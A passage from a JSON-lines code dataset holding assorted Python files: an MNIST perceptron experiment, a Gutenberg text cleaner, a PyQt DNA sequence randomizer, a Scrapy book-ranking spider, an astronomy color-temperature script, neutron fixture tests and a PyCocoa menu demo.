%(iteration,num1,num2)\n plot.savefig(plot_name)\n\ndef get_score(train_images,train_labels,test_images,test_labels,iteration,num1,num2):\n weights = perceptron(train_images,train_labels,test_images,test_labels,iteration)[1]\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(weights[i])\n else:\n weight_neg.append(0)\n\n pos_test, neg_test = [], []\n\n for i in range(len(test_labels)):\n if test_labels[i][0] == num1:\n pos_test.append(test_images[i])\n else:\n neg_test.append(test_images[i])\n #calculate score for num1 images\n score_pos = []\n for i in range(len(pos_test)):\n score = 0\n for j in range(len(pos_test[i])):\n score += abs(weight_pos[j] - pos_test[i][j])\n score_pos.append(score)\n #calculate score for num2 images\n score_neg = []\n for i in range(len(neg_test)):\n score = 0\n for j in range(len(neg_test[i])):\n score += abs(weight_neg[j] - neg_test[i][j])\n score_neg.append(score)\n\n pos_test_score = list(zip(pos_test,score_pos))\n pos_test_score = sorted(pos_test_score,key=itemgetter(1),reverse = True)\n #20 best num1\n best_pos = []\n best_pos_arr = pos_test_score[0:20]\n for i in range(len(best_pos_arr)):\n best_pos.append(best_pos_arr[i][0])\n\n worst_pos_arr = pos_test_score[-21:-1]\n worst_pos = []\n for i in range(len(worst_pos_arr)):\n worst_pos.append(worst_pos_arr[i][0])\n\n neg_test_score = list(zip(neg_test,score_neg))\n neg_test_score = sorted(neg_test_score,key = itemgetter(1),reverse = True)\n #20 best num2\n best_neg = []\n best_neg_arr = neg_test_score[0:20]\n for i in range(len(best_neg_arr)):\n best_neg.append(best_neg_arr[i][0])\n #20 worst num2\n worst_neg = []\n worst_neg_arr = neg_test_score[-21:-1]\n for i in range(len(worst_neg_arr)):\n worst_neg.append(worst_neg_arr[i][0])\n\n #image plot for num1 best 20\n for i in range(len(best_pos)):\n temp = []\n for j in range(0,len(best_pos[i]),28):\n temp.append(best_pos[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num1 worst 20\n for i in range(len(worst_pos)):\n temp = []\n for j in range(0,len(worst_pos[i]),28):\n temp.append(worst_pos[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num1)\n plot.savefig(plt_name)\n\n #image plot for num2 best 20\n for i in range(len(best_neg)):\n temp = []\n for j in range(0,len(best_neg[i]),28):\n temp.append(best_neg[i][j:j+28])\n plot.subplot(4, 5, i + 1)\n plot.imshow(temp,'gray_r')\n plt_name = \"best_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\n #image plot for num2 worst 20\n for i in range(len(worst_neg)):\n temp = []\n for j in range(0,len(worst_neg[i]),28):\n temp.append(worst_neg[i][j:j+28])\n plot.subplot(4,5,i+1)\n plot.imshow(temp,'gray_r')\n plt_name = \"worst_20_%s.png\"%(num2)\n plot.savefig(plt_name)\n\ndef visualize_weight_vector(train_data,train_label,test_data,test_label,iteration,num1,num2):\n weights = perceptron(train_data,train_label,test_data,test_label,iteration)[1]\n\n weight_pos, weight_neg = [], []\n\n for i in range(len(weights)):\n if weights[i] >= 0:\n weight_pos.append(weights[i])\n else:\n weight_pos.append(0)\n\n for i in range(len(weights)):\n if weights[i] <= 0:\n weight_neg.append(abs(weights[i]))\n else:\n weight_neg.append(0)\n pos_weight,neg_weight = [],[]\n\n for i in range(0,len(weight_pos),28):\n pos_weight.append(weight_pos[i:i+28])\n for i in range(0,len(weight_neg),28):\n neg_weight.append(weight_neg[i:i+28])\n\n plot.imshow(pos_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num1)\n plot.savefig(plt_name)\n plot.imshow(neg_weight,'gray_r')\n plt_name = \"weight_%s.png\"%(num2)\n plot.savefig(plt_name)\n \n \ndef sorted_data_visualization(train_data,train_label,test_data,test_label,iteration,num1,num2):\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot_name = \"sorted_accuracy_iteration%s%s.png\" %(num1,num2)\n plot.savefig(plot_name)\n\ndef random_flip(train_data,train_label,test_data,test_label,iteration): #functon for random flip\n index = sample(range(1000), 100)\n\n for i in index:\n if train_label[i] == [1]:\n train_label[i][0] = -1\n else:\n train_label[i][0] = 1\n x = [i*len(train_data) for i in range(iteration)]\n y = []\n for i in range(0,iteration):\n y.append(perceptron(train_data,train_label,test_data,test_label,i)[0])\n plot.ylim(0,100)\n plot.plot(x,y)\n plot.savefig('accuracy_random_flip.png')\n return perceptron(train_data,train_label,test_data,test_label,iteration)[0]\n\n\n\ndef main():\n print(\"Importing MNIST Dataset\")\n mnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,1,6)\n\n print(\"(a). Accuracy for classifying digits 1 and 6\\n(b). Accuracy plot with number of iterations for classifying digits 1 and 6\\n(c). Visualization of learned model for digits 1 and 6\\n(d). Visualization of 20 best and worst scoring images\\n(e). Random flip for 10% of training data\\n(f). Visualization of sorted training data\\n(g). Accuracy plot for digits 2 and 8\\n(h). Weight vector Visualization for digits 2 and 8\\n(i). Accuracy plot with 10 training examples\\n\")\n\n choice = input(\"***Please enter your choice from a to i***\")\n if choice == 'a':\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,6)[0]\n print(\"Accuracy for classifying digits 1 and 6 is:\",accuracy)\n elif choice == 'b':\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Accuracy-iteration plot for digits 1 and 6 ploted!\")\n elif choice == 'c':\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Learned model for digits 1 and 6 plotted!\")\n elif choice == 'd':\n print(\"Image plot for best and worst 20 images\")\n get_score(train_images,train_labels,test_images,test_labels,10,1,6)\n elif choice == 'e':\n accuracy_random = random_flip(train_images,train_labels,test_images,test_labels,10)\n print(\"Accuracy for classifying digits 1 and 6 with 10%\\ random flip\",accuracy_random)\n print(\"Accuracy plot with 10% \\error plotted!\")\n elif choice == 'f':\n train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted = extract_data(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,1,6)\n sorted_data_visualization(train_images_sorted,train_labels_sorted,test_images_sorted,test_labels_sorted,10,1,6)\n print(\"Accuracy plot with sorted data plotted!\")\n elif choice == 'g':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Accuracy-iteration plot for digits 2 and 8 plotted!\")\n elif choice == 'h':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,500,2,8)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy for digits 2 and 8\",accuracy)\n visualize_weight_vector(train_images,train_labels,test_images,test_labels,10,2,8)\n print(\"Learned model for digits 2 and 8 plotted!\")\n elif choice == 'i':\n train_images,train_labels,test_images,test_labels = extract_data_shuffled(mnist.train.images,mnist.train.labels,mnist.test.images,mnist.test.labels,5,1,6)\n accuracy = perceptron(train_images,train_labels,test_images,test_labels,10)[0]\n print(\"Accuracy with 10 training examples\",accuracy)\n accuracy_iteration(train_images,train_labels,test_images,test_labels,10,1,6)\n print(\"Plot for 10 training examples plotted!!\")\n\n\n\n\n\nif __name__ ==\"__main__\":\n main()\n","sub_path":"perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":13686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157695190","text":"#!/usr/bin/python\nimport re\nimport os\nfrom optparse import OptionParser\nfrom os.path import basename\n\n# Delimiters for unwanted content\nhead_delim = \"\\*\\*\\* START OF THIS PROJECT GUTENBERG EBOOK .*\"\ntail_delim = \"\\*\\*\\* END OF THIS PROJECT GUTENBERG EBOOK .*\"\n\nprod_delim = \"produced by .*\"\nend_delim = \"End of Project Gutenberg.*\"\n\nout_path = \"\" # Path to the output directory\nout_suff = \"\" # Suffix of the output files\n\n# Load the file contents as a string\ndef load_file(fname):\n # Open file and load contents\n with open(fname) as f:\n contents = f.read()\n\n # Return file contents\n return contents\n\n# Generate the name of the output file\ndef gen_out_file_name(fname):\n # Strip filename and file extension\n fp, ext = os.path.splitext(fname)\n \n # Rename the file\n of = os.path.basename(fp) + out_suff + ext\n\n # Return the new file path\n return os.path.join(out_path, of)\n\n# Strip the head and tail from the file contents\ndef chomp_head_tail(contents, h_delim, t_delim, flgs=0):\n # Strip head\n contents = re.split(h_delim, contents, maxsplit=1, flags=flgs)\n contents = contents[1] if len(contents) > 1 else contents[0]\n\n # Strip tail\n contents = re.split(t_delim, contents, maxsplit=1, flags=flgs)\n contents = contents[0]\n\n return contents.rstrip().lstrip()\n \n# Strip Project Gutenberg's copyrite information\ndef gutstrip(contents):\n contents = chomp_head_tail(contents, head_delim, tail_delim)\n contents = chomp_head_tail(contents, prod_delim, end_delim, re.IGNORECASE)\n return contents\n\n# Write the document contents to a file\ndef write_to_file(fname, contents):\n with open(fname, \"w\") as f:\n f.write(contents)\n\n# Load file contents, remove copyrite and write to disk\ndef strip(fname):\n # Generate the name of the output file\n contents = load_file(fname)\n contents = gutstrip(contents)\n write_to_file(gen_out_file_name(fname), contents)\n\nif __name__ == \"__main__\":\n # Deal with optional arguments\n parser = OptionParser(usage=\"usage: %prog [options] [FILE]...\")\n parser.add_option(\"-s\", \"--suffix\", dest=\"out_suff\", help=\"Suffix attached to the name of the output file\", default=\"_clean\")\n parser.add_option(\"-o\", \"--output\", dest=\"out_path\", help=\"Destination directory for all output files\", default=\".\")\n\n (options, args) = parser.parse_args()\n\n out_path = options.out_path\n out_suff = options.out_suff\n\n for i in args:\n strip(i)\n\n print (\"Done\")\n","sub_path":"gutstrip.py","file_name":"gutstrip.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"181737761","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# @Time : 2020/10/21 21:44\n# @Author : lirixiang\n# @Email : 565539277@qq.com\n# @File : findFriendNum.py\nclass Solution:\n def findFriendNum(self, M):\n def dfs(x, y, n, m):\n if not (0 <= x < n and 0 <= y < m) or M[x][y] != 1:\n return\n M[x][y] = '2'\n dfs(x - 1, y, n, m)\n dfs(x + 1, y, n, m)\n dfs(x, y - 1, n, m)\n dfs(x, y + 1, n, m)\n\n if len(M) == 0 or len(M[0]) == 0:\n return 0\n res = 0\n n = len(M)\n m = len(M[0])\n for i in range(n):\n for j in range(m):\n if M[i][j] != 1:\n continue\n dfs(i, j, n, m)\n res += 1\n return res\n\n","sub_path":"src/笔试面试/findFriendNum.py","file_name":"findFriendNum.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"585934934","text":"import pandas as pd \nfrom postgresql import pgConnect, pgEngine\n\ndf = pd.read_csv('global_superstore.csv')\nprint(df.head())\n\n# Initiate PostgreSQL connection to DB\nconn = pgConnect()\ncur = conn.cursor()\n\n# PostgreSQL connection doesn't work with Pandas so have initiated this engine as well with SQLAlchemy\nengine = pgEngine()\n\ndf.to_sql('global_superstore',engine, schema='prototyping',if_exists='replace')\nprint('Successfully loaded data')","sub_path":"load_file.py","file_name":"load_file.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"41728479","text":"# Copyright (c) 2015 Thales Services SAS\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport fixtures\nimport testscenarios\n\nfrom neutron.tests import base\nfrom neutron.tests import tools\n\n\nclass NoErrorFixture(tools.SafeFixture):\n\n def __init__(self):\n super(NoErrorFixture, self).__init__()\n self.cleaned = False\n self.called = False\n\n def setUp(self):\n super(NoErrorFixture, self).setUp()\n self.called = True\n\n def cleanUp(self):\n self.cleaned = True\n super(NoErrorFixture, self).cleanUp()\n\n\nclass ErrorAfterFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n super(tools.SafeFixture, self).setUp()\n raise ValueError\n\n\nclass ErrorBeforeFixtureSetup(NoErrorFixture):\n\n def setUp(self):\n raise ValueError\n\n\nclass TestSafeFixture(testscenarios.WithScenarios, base.BaseTestCase):\n scenarios = [\n ('testtools useFixture', dict(fixtures=False)),\n ('fixtures useFixture', dict(fixtures=True)),\n ]\n\n def setUp(self):\n super(TestSafeFixture, self).setUp()\n if self.fixtures:\n self.parent = self.useFixture(fixtures.Fixture())\n else:\n self.parent = self\n\n def test_no_error(self):\n fixture = NoErrorFixture()\n self.parent.useFixture(fixture)\n self.assertTrue(fixture.called)\n self.assertFalse(fixture.cleaned)\n\n def test_error_after_root_setup(self):\n fixture = ErrorAfterFixtureSetup()\n self.assertRaises(ValueError, self.parent.useFixture, fixture)\n self.assertTrue(fixture.cleaned)\n\n def test_error_before_root_setup(self):\n fixture = ErrorBeforeFixtureSetup()\n # NOTE(cbrandily); testtools.useFixture crashs badly if Fixture.setUp\n # is not called or fails.\n self.assertRaises(AttributeError, self.parent.useFixture, fixture)\n self.assertFalse(fixture.cleaned)\n","sub_path":"neutron/tests/functional/test_tools.py","file_name":"test_tools.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"250950706","text":"\"\"\"\r\n--main Gui File--\r\n\r\nThe gui class creates the functionality for the gui.ui file.\r\n\r\nAllows a user to graphically import a seqence, analyze that seqence then\r\nrandomize as needed. Not very much error handling implemented so far.\r\n\r\nCurrently underdevelopment\r\n\r\n\"\"\"\r\n\r\n\r\n#Metadata\r\n__author__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__credits__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__email__ = \"showes@unbc.ca, velde@unbc.ca\"\r\n__python_version__ = \"3.9.0\"\r\n\r\n\r\n#imports\r\nimport sys\r\nimport os\r\nfrom seq_analyzer import seq_analyzer\r\nfrom seq_randomizer import seq_randomizer\r\nfrom Bio.SeqUtils import GC\r\nfrom Bio.Seq import Seq\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtWidgets import QTableWidgetItem\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.uic import loadUi\r\n\r\n\r\n#the seq_gui class\r\nclass seq_gui(QWidget):\r\n\r\n\r\n #constructor\r\n def __init__(self):\r\n super(seq_gui, self).__init__()\r\n loadUi(\"GUIs/gui.ui\", self)\r\n self._load_connects()\r\n self.move(20,20)\r\n self.randomizer = seq_randomizer()\r\n\r\n\r\n #loads the connection for the buttons\r\n def _load_connects(self):\r\n\r\n #bttn_create connects\r\n self.bttn_openSeq.clicked.connect(self.bttn_openSeq_clicked)\r\n self.bttn_save.clicked.connect(self.bttn_save_clicked)\r\n self.bttn_clearSeq.clicked.connect(self.bttn_clearSeq_clicked)\r\n self.bttn_randomize.clicked.connect(self.bttn_randomize_clicked)\r\n self.bttn_analyze.clicked.connect(self.bttn_analyze_clicked)\r\n\r\n\r\n #creates the functionality for the Open button\r\n @pyqtSlot()\r\n def bttn_openSeq_clicked(self):\r\n path, _ = QFileDialog.getOpenFileName(None, \"Load Sequence\", \"\", \"Text Files (*.txt)\")\r\n if path:\r\n file = open(path, \"r\")\r\n contents = file.read()\r\n self.textEdit_seq.setText(contents)\r\n\r\n\r\n #creates the functionality for the Save button\r\n @pyqtSlot()\r\n def bttn_save_clicked(self):\r\n path, _ = QFileDialog.getSaveFileName(None, \"Save Sequence\", \"\", \"*.txt\")\r\n if path:\r\n file = open(path, \"w+\")\r\n contents = self.textEdit_seq.toPlainText()\r\n file.write(contents)\r\n file.close()\r\n\r\n\r\n #creates the functionality for the clear button\r\n @pyqtSlot()\r\n def bttn_clearSeq_clicked(self):\r\n self.textEdit_seq.clear()\r\n\r\n\r\n #creates the functionality for the Randomize button\r\n @pyqtSlot()\r\n def bttn_randomize_clicked(self):\r\n\r\n #getting the sequence\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq uppercase\r\n seq = seq.upper()\r\n\r\n #valid character check\r\n if self._seqCheck(seq):\r\n\r\n #getting the randomization percentage\r\n randPercent = int(self.label_rand.text())\r\n\r\n #getting amino chain from original sequence\r\n proteinSeq = Seq(seq)\r\n oldAnimoChain = str(proteinSeq.translate())\r\n\r\n #randomiztion process\r\n newSeq = self.randomizer.randomize(seq, randPercent)\r\n\r\n #getting new amino chain\r\n newProteinSeq = Seq(newSeq)\r\n newAnimoChain = str(newProteinSeq.translate())\r\n\r\n #comparing chains\r\n #and updating textedit field and analyzing\r\n if newAnimoChain == oldAnimoChain:\r\n self.textEdit_seq.setText(newSeq)\r\n self._analyzeSequence(newSeq)\r\n else:\r\n self._errorMessage(\"Animo Acid Chain MisMatch\")\r\n self.textEdit_aminoSeq.setText(\"Animo Acid Chain MisMatch!\")\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #creates the functionality for the Analyze Sequence button\r\n @pyqtSlot()\r\n def bttn_analyze_clicked(self):\r\n\r\n #getting the sequence from the text edit boxn\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq upper case\r\n seq = seq.upper()\r\n\r\n #checking for valid valid characters\r\n if self._seqCheck(seq):\r\n #calling private analysis functionality\r\n self._analyzeSequence(seq)\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #This function does the analysis on the Sequence in textEdit_seq\r\n def _analyzeSequence(self, sequence):\r\n\r\n #getting sequence length and adding it to character count\r\n self.label_charVal.setText(str(len(sequence)))\r\n\r\n #getting GC richness using biopython\r\n self.label_gcVal.setText(str(round(GC(sequence), 2)))\r\n\r\n #getting Amino Acid composition\r\n protein_seq = Seq(sequence)\r\n self.textEdit_aminoSeq.setText(str(protein_seq.translate()))\r\n\r\n #using seq_analyzer to mine Sequence, returns list of lists\r\n substrings = seq_analyzer.mineSequence(self, sequence, int(self.label_minSubSize.text()), int(self.label_maxSubSize.text()), int(self.label_minOccVal.text()))\r\n\r\n #filling the table\r\n self._populateTable(substrings)\r\n\r\n\r\n #populates the table_subString\r\n def _populateTable(self, list):\r\n\r\n #clearing the table\r\n self.table_subString.setRowCount(0)\r\n\r\n #setting the row count to start adding info\r\n row = 0\r\n\r\n #setting the row count to the number of items\r\n self.table_subString.setRowCount(len(list))\r\n\r\n #adding items\r\n for strings in list:\r\n self.table_subString.setItem(row , 0, QTableWidgetItem(str(strings[0])))\r\n self.table_subString.setItem(row , 1, QTableWidgetItem(str(strings[1])))\r\n self.table_subString.setItem(row , 2, QTableWidgetItem(str(strings[2])))\r\n row = row + 1\r\n\r\n #sorting items by % of sequence\r\n self.table_subString.sortItems(2, Qt.DescendingOrder)\r\n\r\n\r\n #Error Message function\r\n #only parameter is a string which is the Message\r\n def _errorMessage(self, message):\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Error Message Box\")\r\n msg.setIcon(QMessageBox.Warning)\r\n msg.setText(\"----- AN ERROR HAS OCCURED -----\")\r\n msg.setInformativeText(message)\r\n msg.exec()\r\n\r\n\r\n #this function check that a sequence is only composed of G's C's A's T's\r\n #not very efficient but does the job\r\n def _seqCheck(self, sequence):\r\n validChars = \"GCAT\"\r\n return all(chars in validChars for chars in sequence)\r\n","sub_path":"src/seq_gui.py","file_name":"seq_gui.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"64046410","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom dangdang.items import DangdangItem\n\nclass DangSpider(scrapy.Spider):\n name = 'dang'\n allowed_domains = ['bang.dangdang.com']\n start_urls = ['http://bang.dangdang.com/']\n\n def start_requests(self):\n base_url = 'http://bang.dangdang.com/books/bestsellers/01.00.00.00.00.00-month-2020-5-1-1'\n for i in range(1,3):\n url = base_url.replace(base_url[-1],str(i))\n yield scrapy.Request(url,self.parse)\n\n def parse(self, response):\n data_list = response.xpath('//ul[contains(@class,\"bang_list_mode\")]/li')\n for data in data_list:\n item = DangdangItem()\n item['ranking'] = data.xpath('./div[contains(@class,\"list_num\")]/text()').extract_first()\n item[\"book_name\"] = data.xpath('./div[@class=\"name\"]/a/text()').extract_first()\n item[\"pic_url\"] = data.xpath('./div[@class=\"pic\"]/a/@href').extract_first()\n item[\"comment_num\"] = data.xpath('./div[@class=\"star\"]/a/text()').extract_first()\n item[\"publisher_time\"] = data.xpath('./div[@class=\"publisher_info\"][2]/span/text()').extract_first()\n item[\"publisher_name\"] = data.xpath('./div[@class=\"publisher_info\"][2]/a/text()').extract_first()\n item['price'] = data.xpath('./div[@class=\"price\"]/p[1]/span[1]/text()').extract_first()\n yield item\n","sub_path":"爬虫框���scrapy相关/dangdang/dangdang/spiders/dang.py","file_name":"dang.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"291641998","text":"import pyfits\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import fsolve\nfrom astropy.io import fits\n\ndata1 = pyfits.getdata('4imAF.fits') \ndata2 = pyfits.getdata('3imAF.fits')\n\n#set a noise floor for the image. Poor SNR pixels will give you bad temperature measurements.\nfloor1 = 0.045\nfloor2 = 0.070\n\n\n#set low SNR pixels to nans\nav1 = np.where(data1 < floor1)\ndata1[av1] = np.nan\n\n#set low SNR pixels to nans\nav2 = np.where(data2 < floor2)\ndata2[av2] = np.nan\n\n#Color temperatures\n\n#extinction factor for the images (provided by Matt)\nbg1 = 2.58\nbg2 = 1.54\n\n#Bg from Fit3.py code, aka. fitting the histogram\n #I_1Bg = Band 3 background Intensity\n #I_2Bg = Band 4 background Intensity\nI_1Bg = 325\nI_2Bg = 1261\n\n#wavelengths of first image in cm for cgs\nl1 = 12e-4\nl2 = 22e-4\n\n#set constants (in cgs)\nc = 3e10\nh = 6.626e-27\nc = 2.9979e10\nkb = 1.38e-16\n\n#convert wavelengths of images to frequencies\nv1 = c / l1\nv2 = c / l2\n\n#define function for b_nu that we will solve for T\nfunc = lambda T : (v1/v2)**5*(np.expm1((h*v2)/(kb*T)))/(np.expm1((h*v1)/(kb*T)))-I_1/I_2\n\n#provide an initial guess for T for the solver to use. \nTinit = 100.0\n\n#get the shape of the images so we know how big to make the for loop\nshp = np.shape(data1)\n\n#create a new empty array to store the temperature values\nTim = np.zeros((shp[0],shp[1]))\n\nfor i in range (0,shp[0]):\n for j in range (0,shp[1]):\n\n #store the pixel values from the images\n I_1 = data1[i,j]\n I_2 = data2[i,j]\n \n #apply the extinction factors\n I_1 = I_1*bg1\n I_2 = I_2*bg2\n \n #use the solver to find the temperatures\n TS = fsolve(func,Tinit)\n \n #store the values in the array\n Tim[i,j] = TS\n\n#Where the solver returned Tinit, turn into a nan. \nTim[Tim == Tinit] = np.nan\n\n#Creating a new array\nhdu = fits.PrimaryHDU(Tim)\nhdulist = fits.HDUList([hdu])\nhdulist.writeto('1_ColorTempAF_5.fits')\n\n#plot the color temperature map\nplt.figure()\nplt.title('Color-Tempature Map')\nplt.imshow(Tim[::-1])\n#plt.clim(lowval, highval)\nplt.colorbar()\nplt.show()\n\n\n\n#fits.writeto('out.fits', data, header)\n","sub_path":"Code3.py","file_name":"Code3.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"17688858","text":"import json\nimport os.path as osp\nimport sys\n\nids = list()\n\nfor line in open(osp.join('/home/wynmew/workspace/Data', 'trainSet')):\n ids.append(('/home/wynmew/workspace/Data', line.strip()))\n\nfor index in range(len(ids)-1):\n img_id = ids[index]\n annofile = osp.join(img_id[0], img_id[1]).replace(\"images\", \"annotations\").replace('.jpg', '.json')\n with open(annofile) as datafile:\n AnnoData = json.load(datafile)\n #print(annofile)\n # print(AnnoData)\n try:\n label=AnnoData[\"annotations\"][0][\"name\"]\n except:\n print(annofile)","sub_path":"jsonchecker.py","file_name":"jsonchecker.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"242630541","text":"\n# -*- coding: utf-8 -*-\n\n# Originally \n\n# Example of using PyCocoa to create an NSWindow with\n# an application menu item for quitting.\n\nimport run as _ # PYCHOK sys.path\n# all imports listed explicitly to help PyChecker\nfrom pycocoa import NSAlternateKeyMask, NSApplication, NSAutoreleasePool, \\\n NSBackingStoreBuffered, NSControlKeyMask, NSMakeRect, \\\n NSMenu, NSMenuItem, NSStr, NSWindowStyleMaskUsual, \\\n NSWindow, get_selector, terminating\n\n__version__ = '23.01.18'\n\n\ndef create_window(title=''):\n frame = NSMakeRect(10, 100, 500, 100)\n window = NSWindow.alloc().initWithContentRect_styleMask_backing_defer_(\n frame,\n NSWindowStyleMaskUsual,\n NSBackingStoreBuffered,\n 0)\n window.setTitle_(NSStr(title))\n window.makeKeyAndOrderFront_(None)\n return window\n\n\ndef create_menu(name='', app=None):\n menubar = NSMenu.alloc().init()\n appMenuItem = NSMenuItem.alloc().init()\n menubar.addItem_(appMenuItem)\n appMenu = NSMenu.alloc().init()\n\n fullItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Full Screen'), get_selector('enterFullScreenMode:'), NSStr('f'))\n fullItem.setKeyEquivalentModifierMask_(NSControlKeyMask) # Ctrl-Cmd-F\n appMenu.addItem_(fullItem)\n\n appMenu.addItem_(NSMenuItem.separatorItem())\n\n hideItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Hide ' + name), get_selector('hide:'), NSStr('h'))\n appMenu.addItem_(hideItem)\n\n otherItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Hide Others'), get_selector('hideOtherApplications:'), NSStr('h'))\n otherItem.setKeyEquivalentModifierMask_(NSAlternateKeyMask) # Alt-Cmd-H\n appMenu.addItem_(otherItem)\n\n showItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Show All'), get_selector('unhideAllApplications:'), NSStr(''))\n appMenu.addItem_(showItem)\n\n appMenu.addItem_(NSMenuItem.separatorItem())\n\n quitItem = NSMenuItem.alloc().initWithTitle_action_keyEquivalent_(\n NSStr('Quit ' + name), get_selector('terminate:'), NSStr('q'))\n appMenu.addItem_(quitItem)\n\n appMenuItem.setSubmenu_(appMenu)\n\n if app:\n app.setMainMenu_(menubar)\n return menubar\n\n\ndef create_autorelease_pool():\n pool = NSAutoreleasePool.alloc().init()\n return pool\n\n\ndef application(name='Menu'):\n app = NSApplication.sharedApplication()\n create_autorelease_pool()\n create_window(title=name + ' - Type ⌘Q or select Quit from the Python menu')\n create_menu(name=name, app=app)\n return app\n\n\nif __name__ == '__main__':\n\n import sys\n\n app = application()\n if len(sys.argv) > 1:\n terminating(app, sys.argv.pop(1))\n app.run() # never returns\n\n# MIT License \n#\n# Copyright (C) 2017-2023 -- mrJean1 at Gmail -- All Rights Reserved.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,\n# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n","sub_path":"test/simple_menu.py","file_name":"simple_menu.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"631874317","text":"import random\r\nimport pandas as pd\r\nimport re\r\nimport jieba\r\nfrom collections import 